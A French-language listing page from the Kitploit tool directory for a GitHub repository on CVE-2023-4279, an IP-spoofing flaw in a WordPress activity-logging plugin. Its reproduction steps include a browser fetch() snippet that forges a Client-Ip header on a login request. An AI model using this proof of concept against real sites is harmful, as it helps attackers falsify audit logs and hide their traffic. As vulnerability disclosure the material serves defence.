Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-4279 — Dépôt pour la vulnérabilité CVE-2023-4279. | Kitploit
Outils/GitHubGitHub/b0marek/cve-2023-4279
Analyse des VulnérabilitésExploitationÉvasion IDS/IPSOutils d'ImpersonationCollecte d'InformationsSécurité Web
GitHubb0marek/cve-2023-4279

CVE-2023-4279

Dépôt pour la vulnérabilité CVE-2023-4279.

Voir le dépôt
5il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

ID CVE : CVE-2023-4279

Type de vulnérabilité : Usurpation d'adresse IP

Description : Ce plugin récupère les adresses IP des clients à partir d'en-têtes potentiellement non fiables, permettant à un attaquant de manipuler sa valeur. Cela peut être utilisé pour masquer la source du trafic malveillant.

Étapes pour reproduire :

root@kitploit:~
1. Dans User Activity Log > Settings, activez l'option "Allow Ip Address of users to log." et enregistrez les paramètres.

2. Exécutez le code suivant dans le navigateur web et notez côté serveur que l'adresse IP a été falsifiée.

await fetch("/wp-login.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
    "Client-Ip": "8.8.8.8",
  },
  "body": "log=USERNAME&pwd=PASSWORD",
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
}); 

Référence :

  1. https://wpscan.com/vulnerability/2bd2579e-b383-4d12-b207-6fc32cfb82bc
  2. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4279
  3. https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-activity-log/user-activity-log-166-ip-address-spoofing
Télécharger l’outil